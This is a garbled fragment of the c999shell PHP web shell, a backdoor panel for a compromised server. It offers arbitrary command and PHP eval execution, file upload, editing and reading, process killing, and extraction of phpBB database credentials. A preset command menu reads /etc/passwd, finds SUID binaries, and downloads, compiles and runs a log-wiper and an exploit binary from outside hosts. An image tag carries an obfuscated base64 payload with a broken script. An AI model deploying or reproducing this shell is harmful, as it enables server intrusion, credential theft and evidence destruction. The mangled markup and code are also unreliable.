"<a href=""".$surl."act=f&f=".$uo."&ft=info&d=".$ud."""><img src=""".$surl."act=img&img=ext_diz"" alt=""Info"" height=""16"" width=""16"" border=""0""></a><a href=""".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."""><img src=""".$surl."act=img&img=change"" alt=""Change"" height=""16"" width=""19"" border=""0""></a><a href=""".$surl."act=f&f=".$uo."&ft=download&d=".$ud."""><img src=""".$surl."act=img&img=download"" alt=""Download"" height=""16"" width=""19"" border=""0""></a><center><b></b></center><br>
<table cellspacing="0" cellpadding="0" width="100%" bgcolor="#333333" bordercolorlight="#433333" border="0"><input type="hidden" name="act" value=".$dspact."><input type="hidden" name="d" value=".$d."><tbody><tr><td>".$v."</td></tr></tbody></table><hr size=""1"" noshade=""><p align=""right"">
<script>
function ls_setcheckboxall(status)
{
var id = 1;
var num =
while (id <= num)
id++;
}
}
function ls_reverse_all()
{
var id = 1;
var num =
while (id <= num)
id)
id++;
}
}
</script>
<input type=""button"" onclick=""ls_setcheckboxall(true);"" value=""Select" all"=""> <input type=""button"" onclick=""ls_setcheckboxall(false);"" value=""Unselect" all"="">
<b><img src=""".$surl."act=img&img=arrow_ltr"" border=""0"
<input type=" submit"="" name="actarcbuff" value=""Pack" buffer="" to="" archive"=""> <input type=""text"" name=""actarcbuff_path"" value=""archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz"<input type=" submit"=""> <input type="submit" name=""actemptybuff"" value=""Empty" buffer="" }="" echo="" "<select=""><option value=""".$act.""</option>" ;="" echo="" "<option="" =="delete" ?"="" selected":"")."=""></option>";
<option value="chmod".($dspact" =="chmod" ?"="" selected":"")."="">Change-mode</option>";
if ($usefsbuff)
{
echo "<option value="cut".($dspact" =="cut" ?"="" selected":"")."="">Cut</option>";
echo "<option value="copy".($dspact" =="copy" ?"="" selected":"")."="">Copy</option>";
echo "<option value="unselect".($dspact" =="unselect" ?"="" selected":"")<="" option="">
}
echo " <input type="submit" value=""></option></b></p><b>";
<center><a href=""".$surl."act=processes&grep=".basename($binpath)."""><u></u></a></center>";}
"<br>";
<b><center><a href=""".$surl."act=processes&grep=".basename($binpath)."""><u> </u></a></center>
"<br>";
:</b><br><input type="hidden" name="act" value="tools"><input type="hidden" name="d" value="<?php echo $d; ?>">Port: <input type="text" name="bind[port]" value="<?php echo htmlspecialchars($bind[" port"]);="" ?="">"> Password: <input type="text" name="bind[pass]" value=" value=" <?php="" echo="" $d;="" ?="">">HOST: <input type="text" name="bc[host]" value="<?php echo htmlspecialchars($bc[" host"]);="" ?="">"> Port: <input type="text" name="bc[port]" value=">">HOST: <input type="text" name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe[" remoteaddr"]);="" ?="">"> Local port: <input type="text" name="datapipe[localport]" value="<
if ($act == " processes")="" {="" echo="" "<b--="">Processes:</b></u></count($row)-1;$i++)></b><u><br>";
if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
else {$handler = "tasklist";}
$ret = myshellexec($handler);
if (!$ret) {echo "Can't execute "".$handler.""!";}
else
{
if (empty($processes_sort)) {$processes_sort = $sort_default;}
$parsesort = parsesort($processes_sort);
if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
$k = $parsesort[0];
if ($parsesort[1] != "a") {$y = "<a href=""".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a""><img src=""".$surl."act=img&img=sort_desc"" height=""9"" width=""14"" border=""0""></a>";}
else {$y = "<a href=""".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d""><img src=""".$surl."act=img&img=sort_asc"" height=""9"" width=""14"" border=""0""></a>";}
$ret = htmlspecialchars($ret);
if (!$win)
{
if ($pid)
{
if (is_null($sig)) {$sig = 9;}
echo "Sending signal ".$sig." to #".$pid."... ";
if (posix_kill($pid,$sig)) {echo "OK.";}
else {echo "ERROR.";}
}
while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
$stack = explode("n",$ret);
$head = explode(" ",$stack[0]);
unset($stack[0]);
for($i=0;$i<count($head);$i++) {="" if="" ($i="" !="$k)" {$head[$i]="<a href=" ".$surl."act=".$dspact." &d=".urlencode($d)." &processes_sort=".$i.$parsesort[1]." "=""><b>".$head[$i]."</b>";}
}
$prcs = array();
foreach ($stack as $line)
{
if (!empty($line))
{
echo "</count($head);$i++)></u></td></tr></tbody></table></b></b></b></form></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr></tr><tr></tr></tbody></table><table height="1" cellspacing="0" bordercolordark="#666666" cellpadding="5" width=""100%"" bgcolor="#333333" bordercolorlight="#c0c0c0" border="1" bordercolor=""#C0C0C0""><tbody><tr><td>".$v."</td></tr></tbody></table><b>Result of execution this PHP-code</b>:<br>
<br><textarea cols=""122"" rows=""".$rows.""" readonly="">".htmlspecialchars($ret)."</textarea><br><br><textarea cols=""122"" rows=""15"" readonly=""> </textarea><b></b><form action=""".$surl.""" method="POST"><input type="hidden" name="act" value="eval"><textarea name=""eval"" cols=""122"" rows=""10"">".htmlspecialchars($eval)."</textarea><input type="hidden" name=""d"" value=""".$dispd."""><br><br><input type="submit" value=""Execute""> Display in text-area <input type=""checkbox"" name=""eval_txt"" value=""1"";" if="" ($eval_txt)="" {echo="" "="" checked";}="" echo=""></form><center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center><center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=""".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1""><u>Create</u></a></center><img src=""".$surl."act=img&img=ext_diz"" border=""0"">","info"),
array("<img src=""".$surl."act=img&img=ext_html"" border=""0"">","html"),
array("<img src=""".$surl."act=img&img=ext_txt"" border=""0""><img src=""".$surl."act=img&img=ext_exe"" border=""0""><img src=""".$surl."act=img&img=ext_gif"" border=""0""><img src=""".$surl."act=img&img=ext_ini"" border=""0""><img src=""".$surl."act=img&img=download"" border=""0"">","download"),
array("<img src=""".$surl."act=img&img=ext_rtf"" border=""0"">","notepad"),
array("<img src=""".$surl."act=img&img=change"" border=""0"">","edit")
);
echo "<b>Viewing file: <img src=""".$surl."act=img&img=ext_".$ext.""" border=""0""> ".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
foreach($arr as $t)
{
if ($t[1] == $rft) {echo " <a href=""".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."""><font color="green">".$t[0]."</font></a><a href=""".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."""><b><u>".$t[0]."</u></b></a>";}
else {echo " <a href=""".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."""><b>".$t[0]."</b></a>";}
echo " (<a href=""".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d).""" target=""_blank"">+</a>) |";
}
echo "<hr size=""1"" noshade="">";
if ($ft == "info")
{
echo "<b>Information:</b>";
if (!$win)
{
echo "<table border="0" cellspacing="1" cellpadding="2"><tbody><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr><tr><td><b>Owner/Group</b></td><td> ";
$ow = posix_getpwuid(fileowner($d.$f));
$gr = posix_getgrgid(filegroup($d.$f));
echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
}
echo "</td></tr><tr><td><b>Perms</b></td><td><a href=""".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d).""">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></tbody></table><br>";
$fi = fopen($d.$f,"rb");
if ($fi)
{
if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
$n = 0;
$a0 = "00000000<br>";
$a1 = "";
$a2 = "";
for ($i=0; $i<strlen($str); $i++)="" {="" $a1="" .="sprintf("%02X",ord($str[$i]))."" ";="" switch="" (ord($str[$i]))="" case="" 0:="" $a2="" ;="" break;="" 32:="" 10:="" 13:="" default:="" }="" $n++;="" if="" ($n="=" $hexdump_rows)="" $n="0;" ($i+1="" <="" strlen($str))="" {$a0="">";}
$a1 .= "<br>";
$a2 .= "<br>";
}
}
//if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
echo "<table border="0" bgcolor="#666666" cellspacing="1" cellpadding="4"><tbody><tr><td bgcolor="#666666">".$a0."</td><td bgcolor="000000">".$a1."</td><td bgcolor="000000">".$a2."</td></tr></tbody></table><br>";
}
$encoded = "";
if ($base64 == 1)
{
echo "<b>Base64 Encode</b><br>";
$encoded = base64_encode(file_get_contents($d.$f));
}
elseif($base64 == 2)
{
echo "<b>Base64 Encode + Chunk</b><br>";
$encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
}
elseif($base64 == 3)
{
echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
$encoded = base64_encode(file_get_contents($d.$f));
$encoded = substr(preg_replace("!.{1,76}!","'\0'.n",$encoded),0,-2);
}
elseif($base64 == 4)
{
$text = file_get_contents($d.$f);
$encoded = base64_decode($text);
echo "<b>Base64 Decode";
if (base64_encode($encoded) != $text) {echo " (failed)";}
echo "</b><br>";
}
if (!empty($encoded))
{
echo "<textarea cols="80" rows="10">".htmlspecialchars($encoded)."</textarea><br><br>";
}
echo "<b>HEXDUMP:</b><nobr> [<a href=""".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d).""">Full</a>] [<a href=""".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d).""">Preview</a>]<br><b>Base64: </b>
</nobr><nobr>[<a href=""".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d).""">Encode</a>] </nobr>
<nobr>[<a href=""".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d).""">+chunk</a>] </nobr>
<nobr>[<a href=""".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d).""">+chunk+quotes</a>] </nobr>
<nobr>[<a href=""".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d).""">Decode</a>] </nobr>
<p>";
}
elseif ($ft == "html")
{
if ($white) {@ob_clean();}
echo $r;
if ($white) {c999shexit();}
}
elseif ($ft == "txt") {echo "</p><pre>".htmlspecialchars($r)."</pre>";}
elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
elseif ($ft == "phpsess")
{
echo "<pre>";
$v = explode("|",$r);
echo $v[0]."<br>";
var_dump(unserialize($v[1]));
echo "</pre>";
}
elseif ($ft == "exe")
{
$ext = explode(".",$f);
$c = count($ext)-1;
$ext = $ext[$c];
$ext = strtolower($ext);
$rft = "";
foreach($exeftypes as $k=>$v)
{
if (in_array($ext,$v)) {$rft = $k; break;}
}
$cmd = str_replace("%f%",$f,$rft);
echo "<b>Execute file:</b><form action=""".$surl.""" method="POST"><input type="hidden" name="act" value="cmd"><input type=""text"" name=""cmd"" value=""".htmlspecialchars($cmd).""" size=""".(strlen($cmd)+2)."""><br>Display in text-area<input type=""checkbox"" name=""cmd_txt"" value=""1"" checked=""><input type="hidden" name=""d"" value=""".htmlspecialchars($d)."""><br><input type="submit" name="submit" value=""Execute""></form>";
}
elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
elseif ($ft == "code")
{
if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
{
$arr = explode("n",$r);
if (count($arr == 18))
{
include($d.$f);
echo "<b>phpBB configuration is detected in this file!<br>";
if ($dbms == "mysql4") {$dbms = "mysql";}
if ($dbms == "mysql") {echo "<a href=""".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."""><b><u>Connect to DB</u></b></a><br><br>";}
else {echo "But, you can't connect to forum sql-base, because db-software="".$dbms."" is not supported by c999shell. Please, report us for fix.";}
echo "Parameters for manual connect:<br>";
$cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
echo "</b><hr size=""1"" noshade="">";
}
}
echo "<div style=""border" :="" 0px="" solid="" #ffffff;="" padding:="" 1em;="" margin-top:="" margin-bottom:="" margin-right:="" margin-left:="" background-color:="" ".$highlight_background="" .";"="">";
echo "<a href=""".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v.""">";
if ($imgsize != $v ) {echo $v;}
else {echo "<u>".$v."</u>";}
echo "</a> ";
}
echo "<br><br><img src=""".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d).""" width=""".$width.""" height=""".$height.""" border=""1"">";
echo "<form action=""".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d).""" method="POST"><input type="submit" name="submit" value=""Save""> <input type=""reset"" value=""Reset""> <input type=""button"" onclick=""location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';"" value=""Back""><br><textarea name=""edit_text"" cols=""122"" rows=""".$rows.""">".htmlspecialchars($r)."</textarea></form><center></center>
"<br><center>
<src=""".$surl."act=img&img=".$u.""" border="&quot1""><br></src=""".$surl."act=img&img=".$u."""></center><center><b><br><br><br></b><a bookmark="minipanel"><br><table style="BORDER-COLLAPSE: collapse" cellspacing="0" bordercolordark="#666666" cellpadding="5" height="1" width="100%" bgcolor="#333333" bordercolorlight="#c0c0c0" border="1">
<tbody><tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b></b></a> ::</b></p></td></tr>
<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type="hidden" name="cmd_txt" value="1"> <input type="submit" name="submit" value="Execute"></form></center></td><td width="50%" height="1" valign="top"><center><b> </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><select name="cmd"><!--?php foreach ($cmdaliases as $als) {echo "<option value="".htmlspecialchars($als[1]).""--></select><input type="hidden" name="cmd_txt" value="1"> <input type="submit" name="submit" value="Execute"></form></center></td></tr></tbody></table>
<br>
<table style="BORDER-COLLAPSE: collapse" cellspacing="0" bordercolordark="#666666" cellpadding="5" height="116" width="100%" bgcolor="#333333" bordercolorlight="#c0c0c0" border="1">
<tbody><tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"> </a></b> ::</p></td></tr>
<tr>
<td width="50%" height="83" valign="top"><center>
<div align="center
</div>
<form action=" <?php="" echo="" $surl;="" ?>"="">
<div align="center">
<input type="hidden" name="act" value="cmd">
<input type="hidden" name="d" value="<?php echo $dispd; ?>">
<select name="cmd">
<option value="uname -a">
</option><option value="w">
</option><option value="lastlog">
</option><option value="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins
</option><option value="cut -d: -f1,2,3 /etc/passwd | grep ::
</option><option value=" find="" etc="" -type="" f="" -perm="" -o+w="" 2=""> /dev/null">
</option><option value="which wget curl w3m lynx" <="" option=""></option><option value="cat /proc/version /proc/cpuinfo" <="" option=""></option><option value="netstat -atup | grep IST">
</option><option value="locate gcc">
</option><option value="rm -Rf">
</option><option value="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">
</option><option value="gcc zap2.c -o zap2
</option><option value=" .="" zap2"="">
</option><option value="wget http://ftp.powernet.com.tr/supermail/debug/k3"> </option><option value="./k3 1
</option><option value=" .="" k3="" 2="" <="" option=""></option><option value="./k3 3
</option><option value=" .="" k3="" 4"="">
</option><option value="./k3 5">
</option></select>
<input type="hidden" name="cmd_txt" value="1">
<input type="submit" name="submit" value="Execute">
<br>
</div></div></center></td>
<td width="50%" height="83" valign="top"><center>
<center>Kernel Info: <form name="form1" method="post" action="http://google.com/search">
<input name="q" type="text" id="q" value="<?php echo wordwrap(php_uname()); ?>">
<input type="hidden" name="client" value="firefox-a">
<input type="hidden" name="rls" value="org.mozilla:en-US:official">
<input type="hidden" name="hl" value="en">
<input type="hidden" name="hs" value="b7p">
<input type="submit" name="btnG" value="Search">
</form></center>
</center></td>
</tr></tbody></table><br>
<table style="BORDER-COLLAPSE: collapse" cellspacing="0" bordercolordark="#666666" cellpadding="5" height="116" width="100%" bgcolor="#333333" bordercolorlight="#c0c0c0" border="1">
<tbody><tr><td height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b <="" b=""></b></a><b <="" b=""> ::</b></b></p></td></tr>
<tr>
<td width="50%" height="83" valign="top"><center>
<div align="center">
</div><br>
<form action="<?php echo $surl; ?>">
<div align="center">
File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br>
<!--?
function rsg_read()
{
$test="";
$temp=tempnam($test, "cx");
$file=$_GET['file'];
$get=htmlspecialchars($file);
echo "<br--> <font color="#000099"><b></b></font><br><div class=""shell""><b></b><br><br><font color=""white""></font><br><b><br> <font color="#000099"></font></b><font color=""RED""></font>
<!--?
function rsg_glob()
{
$chemin=$_GET['directory'];
$files = glob("$chemin*");
echo "Trying To List Folder <font color=#000099--><b></b><br>
<br>
</div></div>
</form>
</center></td>
<td width="50%" height="83" valign="top"><center>
<center><form action="<?php echo $surl; ?>">
<div align="center"><br>
Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br>
</div></form></center>
</center></td>
</tr></tbody></table><br>
<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC">
<script type="text/javascript">
if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='�'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f(a):a;for(var c=0;c<coded.c+=4){h1=f(c)h2=f.(coded.(c+1));h3=f(c+2));h4=f.(coded.(c+3)
</script>
<table style="BORDER-COLLAPSE: collapse" cellspacing="0" bordercolordark="#666666" cellpadding="5" height="1" width="100%" bgcolor="#333333" bordercolorlight="#c0c0c0" border="1">
<tbody><tr>
<td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type="hidden" name="act" value="search"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)"> <input type="checkbox" name="search_name_regexp" value="1" checked=""> - regexp <input type="submit" name="submit" value="Search"></form></center><p></p></td>
<td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" enctype="multipart/form-data" action="/?_rdc=1&_rdr"><input type="hidden" name="act" value="upload"><input type="file" name="uploadfile"><input type="hidden" name="miniform" value="1"> <input type="submit" name="submit" value="Upload"><br><!--?php echo $wdt; ?--></form></center></td>
</tr>
</tbody></table>
<br><table style="BORDER-COLLAPSE: collapse" cellspacing="0" bordercolordark="#666666" cellpadding="5" height="1" width="100%" bgcolor="#333333" bordercolorlight="#c0c0c0" border="1"><tbody><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="mkdir"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>"> <input type="submit" value="Create"><br><!--?php echo $wdt; ?--></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type="hidden" name="act" value="mkfile"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type="hidden" name="ft" value="edit"><input type="submit" value="Create"><br><!--?php echo $wdt; ?--></form></center></td></tr></tbody></table>
<br><table style="BORDER-COLLAPSE: collapse" cellspacing="0" bordercolordark="#666666" cellpadding="5" height="1" width="100%" bgcolor="#333333" bordercolorlight="#c0c0c0" border="1"><tbody><tr><td width="50%" height="1" valign="top"><center><b></b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>"> <input type="submit" value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="gofile"><input type="hidden" name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>"><input type="submit" value="Go"></form></center></td></tr></tbody></table>
<br><table style="BORDER-COLLAPSE: collapse" height="1" cellspacing="0" bordercolordark="#666666" cellpadding="0" width="100%" bgcolor="#333333" bordercolorlight="#c0c0c0" border="1"><tbody><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c999shell v. <!--?php echo $shver; ?--> <a href="<?php echo $surl; ?>act=about"><u><b>Modded by</b></u></a> Shadow | <a href="http://rootshell-security.net"><font color="#FF0000"></font></a><font color="#FF0000"></font> | <a href="http://r57shell.net"><font color="#FF0000" shell<="" font=""></font></a><font color="#FF0000" shell<="" font=""><font color="#FF0000"></font> | <!--?php echo round(getmicrotime()-starttime,4); ?--> ]--</font></b></p></td></tr></tbody></table>
|
-trade
